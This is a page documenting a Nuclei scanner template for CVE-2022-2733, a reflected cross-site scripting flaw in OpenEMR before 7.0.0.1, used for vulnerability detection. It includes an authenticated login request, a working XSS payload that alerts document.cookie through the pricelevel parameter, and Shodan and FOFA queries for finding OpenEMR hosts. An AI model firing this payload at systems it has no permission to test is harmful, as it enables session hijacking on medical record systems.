Openemr < 7.0.0.1 - Cross-Site Scripting
ID: CVE-2022-2733
Severity: medium
Author: ctflearner
Tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr
Description
Section titled “Description”Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.
YAML Source
Section titled “YAML Source”id: CVE-2022-2733
info: name: Openemr < 7.0.0.1 - Cross-Site Scripting author: ctflearner severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability. reference: - https://huntr.dev/bounties/25b91301-dfb0-4353-a732-e051bbe8420c/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2733 - https://github.com/openemr/openemr/commit/59458bc15ab0cb556c521de9d5187167d6f88945 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2733 cwe-id: CWE-79 epss-score: 0.00143 epss-percentile: 0.49164 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: open-emr product: openemr shodan-query: - title:"OpenEMR" - http.html:"openemr" - http.title:"openemr" - http.favicon.hash:1971268439 fofa-query: - icon_hash=1971268439 - body="openemr" - title="openemr" - app="openemr" google-query: intitle:"openemr" tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr
http: - raw: - | POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/interface/login/login.php?site=default
new_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1 - | GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '<img src=a onerror=alert(document.cookie)>' - 'pricelevel' condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4b0a00483046022100cc7ae2c43b356a44097bdd97e031dcd4cef6bf9d389f632eff2500cd2cc9c7eb022100ffa816485ed356b90649486afafeb32b7de4f5d1618b62e3e557ce561f28f069:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2733.yaml"